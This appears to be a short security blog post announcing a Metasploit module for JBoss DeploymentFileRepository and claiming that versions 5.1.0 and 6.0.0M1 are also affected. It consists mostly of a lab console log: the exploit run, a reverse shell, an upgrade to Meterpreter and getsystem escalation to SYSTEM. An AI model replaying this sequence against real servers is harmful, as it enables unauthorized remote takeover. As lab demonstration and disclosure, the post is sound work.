MC pushed out a new exploit today (jboss_deploymentfilerrepository)
so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>whoami
whoami
win2k3lab/administrator
C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>^Z
Background session 3? [y/N] y
msf exploit(jboss_deploymentfilerepository) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 shell 192.168.1.101:4444 -> 192.168.1.101:57796
msf exploit(jboss_deploymentfilerepository) > sessions -u 3
msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010
msf exploit(jboss_deploymentfilerepository) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 shell 192.168.1.101:4444 -> 192.168.1.101:57796
4 meterpreter win2k3lab/Administrator @ win2k3lab 192.168.1.101:4444 -> 192.168.1.101:36591
msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: win2k3lab/Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM
meterpreter > pwd
C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin
meterpreter >
